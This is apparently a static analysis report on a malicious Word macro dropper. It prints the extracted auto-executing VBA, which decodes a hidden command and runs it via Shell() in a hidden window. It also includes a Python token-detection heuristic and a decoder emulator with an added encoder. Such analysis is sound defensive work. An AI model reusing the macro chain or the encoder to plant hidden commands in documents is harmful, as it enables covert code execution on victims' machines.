Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 689758d11e57287c…

MALICIOUS

Office (OLE)

Size: 110.0 KB
Created: 2017-07-13 05:16:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 0797cb4d70a6b2cd187f29e1118894bd
SHA-1: 7e94ba7b101834e6a41726dbd94d29b7c7202282
SHA-256: 689758d11e57287c809250a14b38fa2833b2c7895a7823562fca85e87c740b84
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution
The heuristics below evidence T1059.005 (an auto-executing VBA macro that reaches Shell()) and T1566.001 (an enable-content lure in a document attachment). None of the listed heuristics identifies a parser or memory-corruption exploit, so T1203 is not supported by the findings on this page and should be read as a tentative mapping rather than a result.

The sample contains VBA macros with an autoopen routine whose call chain (autoopen -> bessameat -> vantalin -> supernosa) ends in a Shell() call, so the document is built to execute a payload as soon as macros run. The command string is not stored in the macro source: vantalin rebuilds it at runtime from UserForm1.Label2.Caption by discarding every byte that occurs in the filter string "M1Z8CKV" and subtracting a key (UserForm1.Label1.Left minus 11) from each remaining byte. supernosa then runs the result with Shell(command, 0), i.e. in a hidden window (vbHide), but only if the decoded string is exactly 254 characters long, and bessameat invokes it twice. Because the caption and the control geometry live in the UserForm1 storage rather than in the extracted VBA, the final command is not recovered by this static pass. The document body explicitly instructs the user to 'Enable Content' to view secure information, a common lure for macro-based malware. The ClamAV detection name 'Doc.Dropper.Agent-6520162-0' further supports its classification as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6520162-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520162-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL recovered from this sample is an XML namespace identifier (OOXML, SharePoint content-type, Dublin Core and XML Schema URIs) found in the document body text: these are schema names, not network destinations, and none of them is a download or C2 indicator. The command the macro executes is assembled at runtime from UserForm1.Label2.Caption and does not appear among the extracted strings.
    • http://schemas.openxmlformats.org/drawingml/2006/main  (in document text, OLE body)
    • http://schemas.microsoft.com/sharepoint/v3/contenttype/forms  (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/metadata/contentType  (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/metadata/properties/  (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes  (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/metadata/properties  (in document text, OLE body)
    • http://www.w3.org/2001/XMLSchema  (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/documentManagement/types  (in document text, OLE body)
    • http://schemas.microsoft.com/office/infopath/2007/PartnerControls  (in document text, OLE body)
    • http://schemas.openxmlformats.org/package/2006/metadata/core-properties  (in document text, OLE body)
    • http://www.w3.org/2001/XMLSchema-instance  (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/  (in document text, OLE body)
    • http://purl.org/dc/terms/  (in document text, OLE body)
    • http://schemas.microsoft.com/internal/obd  (in document text, OLE body)
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsd  (in document text, OLE body)
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsd  (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  (in document text, OLE body)
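The token co-occurrence check that OLE_VBA_PCODE_AUTOEXEC_EXEC describes, written out as an added Python example (this is not the analysis tool's own implementation). It scans a raw VBA module or _VBA_PROJECT stream for auto-exec names and execution primitives in both their ASCII and UTF-16LE spellings and flags only when both kinds are present, which is what lets the check fire on a stomped or p-code-only document where "Sub autoopen()" no longer exists as source text. The token lists and the sample byte strings are constructed for the example; they do not reproduce a real stream layout, only the property the heuristic relies on, that identifier names survive in the compiled data after the compressed source is stripped.

```python
import re

# Names VBA runs without user interaction (Word and Excel variants); constructed list.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoNew", "AutoClose", "AutoExit",
                   "Document_Open", "Document_Close", "Workbook_Open", "Auto_Open")
# Shell / download / object-execution primitives; kept specific to limit noise.
EXEC_TOKENS = ("Shell", "ShellExecute", "WScript.Shell", "CreateObject", "GetObject",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream")


def _compile(tokens):
    """One case-insensitive pattern per token, matching its ASCII or UTF-16LE spelling."""
    compiled = []
    for tok in tokens:
        alts = b"|".join(re.escape(tok.encode(enc)) for enc in ("ascii", "utf-16-le"))
        compiled.append((tok, re.compile(b"(?:" + alts + b")", re.IGNORECASE)))
    return compiled


_AUTOEXEC = _compile(AUTOEXEC_TOKENS)
_EXEC = _compile(EXEC_TOKENS)


def scan_stream(stream: bytes):
    """Return (auto-exec tokens, execution tokens) found anywhere in a raw stream."""
    auto = sorted(tok for tok, pat in _AUTOEXEC if pat.search(stream))
    exe = sorted(tok for tok, pat in _EXEC if pat.search(stream))
    return auto, exe


def pcode_autoexec_exec(stream: bytes) -> bool:
    """The heuristic itself: an auto-exec trigger AND an execution primitive must co-occur."""
    auto, exe = scan_stream(stream)
    return bool(auto) and bool(exe)


# Constructed stand-ins (not real stream layouts): no "Sub autoopen()" source text,
# only identifier entries as they might survive in compiled data, in mixed encodings.
SAMPLE_STOMPED = (b"\x01\x16\x03\x00\x00\xf0" + b"autoopen".ljust(12, b"\x00")
                  + b"bessameat\x00supernosa\x00" + "Shell".encode("utf-16-le") + b"\x00\x00")
SAMPLE_BENIGN_AUTOEXEC = b"\x00\x01" + "AutoOpen".encode("utf-16-le") + b"\x00MsgBox\x00"


if __name__ == "__main__":
    for name, blob in (("stomped", SAMPLE_STOMPED), ("autoexec-only", SAMPLE_BENIGN_AUTOEXEC)):
        print(name, scan_stream(blob), "->", pcode_autoexec_exec(blob))
```

On real streams the individual tokens are noisy (the "Shell" pattern also hits ShellExecute and any identifier containing it), which is why the verdict rests on the conjunction of a trigger and a primitive rather than on either alone; a stream with an auto-exec name but only MsgBox, as in the second sample, is not flagged.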

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1928 bytes
SHA-256: 5195b8256d915c0186bccec874fac493fa418a61e142ce317d33b8b8da4f9a22

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Rem bap bap bap
bessameat
End Sub


Attribute VB_Name = "Module1"

Sub bessameat()
Dim str2 As String
Dim id As Integer

Dim ota As Integer
With UserForm1.Label1


ota = .Left
End With

Dim j As Integer
str2 = vantalin(ota)

For j = 0 To 1
supernosa (str2)
id = id + 1

Next


End Sub

Sub supernosa(jon)
Dim td As Integer
td = 254

jsdf = Len(jon)

td = jsdf - td

If jsdf = 254 Then

Shell jon, td
End If

End Sub



Function vantalin(cde)

Dim QlyC As String
Dim Eftdxb() As Byte
Dim Vfxbovft() As Byte
Dim askg As String

askg = "M1Z8CKV"
Dim LanjyA As String
LanjyA = UserForm1.Label2.Caption
Dim Nyji As String

Dim Jvpbobb() As Byte
QlyC = "IhgypyadO"
Vfxbovft = LanjyA

Eftdxb = askg
Ru = UBound(Vfxbovft)
Nyji = "Moaygys"
Dim Lkej5 As String

Yrb = UBound(Eftdxb)
Lkej5 = ""
cde = cde - 11
For iifyjn = 0 To Ru
nvf8 = 0
For ob = 0 To Yrb

If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1
Next
If nvf8 = 0 Then
city = Vfxbovft(iifyjn) - cde
Lkej5 = Lkej5 + Chr$(city)

End If

Next
Dim Rogy As String

vantalin = Lkej5
Rogy = "Create document"

End Function






Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D99F50C2-1CC4-4C88-9387-FEFC4D9A26C5}{952455F0-1062-4F4B-8C62-FD5D484C4145}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
 Label1.Caption = "Start"
End Sub

Private Sub Label3_Click()

End Sub
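The decoder and the Shell gate from the listing above, re-implemented in Python as an added example (this is not code from the sample or from the analysis tool). It emulates vantalin(), supernosa() and bessameat(); the Label2 caption and the Label1.Left value are not present in the extracted source, so the inputs here are constructed, and build_caption() is an added inverse used only to manufacture a caption for the demonstration. One detail an emulator has to get right: assigning a VBA String to a Byte array yields the string's UTF-16LE bytes, so the filter set built from "M1Z8CKV" also contains 0x00 and silently drops the high byte of every character in the caption.

```python
FILTER_CHARS = "M1Z8CKV"      # askg in vantalin(): bytes with these values are discarded
SHELL_LENGTH_GATE = 254       # td in supernosa(): Shell() fires only for exactly this length


def vba_bytes(s: str) -> bytes:
    """VBA quirk: `ByteArray = SomeString` gives the UTF-16LE bytes of the string."""
    return s.encode("utf-16-le")


def vantalin(caption: str, left: int) -> str:
    """Emulate Function vantalin(cde). `caption` stands in for UserForm1.Label2.Caption and
    `left` for UserForm1.Label1.Left; both are assumed inputs, the real values sit in the
    form storage and were not recovered by the static pass."""
    key = left - 11                       # cde = cde - 11
    filt = set(vba_bytes(FILTER_CHARS))   # {0x4D,0x31,0x5A,0x38,0x43,0x4B,0x56, 0x00}
    decoded = []
    for b in vba_bytes(caption):
        if b in filt:                     # nvf8 > 0: junk byte or NUL high byte, skipped
            continue
        city = b - key
        if not 0 <= city <= 255:          # Chr$() raises runtime error 5 outside 0..255
            raise ValueError(f"Chr$ argument out of range: {city}")
        decoded.append(chr(city))         # Chr$ maps 128..255 via the ANSI code page; Latin-1 here
    return "".join(decoded)


def supernosa(jon: str):
    """Emulate Sub supernosa(jon). Returns (command, window_style) when Shell would run, else
    None. td = Len(jon) - 254 is 0 on the only path that reaches Shell, and window style 0
    is vbHide, so the command runs in a hidden window."""
    jsdf = len(jon)
    td = jsdf - SHELL_LENGTH_GATE
    if jsdf == SHELL_LENGTH_GATE:
        return jon, td
    return None


def bessameat(caption: str, left: int) -> list:
    """Emulate Sub bessameat: decode once, then call supernosa twice (For j = 0 To 1)."""
    str2 = vantalin(caption, left)
    return [supernosa(str2) for _ in range(2)]


def build_caption(command: str, left: int) -> str:
    """Constructed inverse of vantalin() (not part of the macro): produce a caption that
    decodes back to `command`, with filter characters sprinkled in as junk."""
    key = left - 11
    out = []
    for i, ch in enumerate(command):
        enc = ord(ch) + key
        if not 1 <= enc <= 255 or chr(enc) in FILTER_CHARS:
            raise ValueError(f"{ch!r} cannot be encoded with key {key}")
        out.append(chr(enc))
        if i % 7 == 3:                    # junk the decoder discards
            out.append(FILTER_CHARS[i % len(FILTER_CHARS)])
    return "".join(out)


# Constructed sample inputs, not values recovered from the real document.
SAMPLE_LEFT = 30
SAMPLE_COMMAND = "cmd.exe /c echo constructed sample payload, not from the real document".ljust(254)


def demo() -> list:
    """Run the emulated chain on the constructed caption."""
    return bessameat(build_caption(SAMPLE_COMMAND, SAMPLE_LEFT), SAMPLE_LEFT)


if __name__ == "__main__":
    for call in demo():
        print(call)
```

Two things fall out of running it. The window style handed to Shell is always 0 (vbHide) on the path that reaches it, so nothing is shown to the user. And the gate only checks that the decoded string is 254 characters long, not that it is well formed: a wrong Left value shifts every byte by the same amount and still yields a 254-character string, so the macro runs a garbage command rather than failing closed. When a live copy is available, the quickest route to the real command is to read Label2.Caption and Label1.Left from the UserForm1 storage and feed them to vantalin().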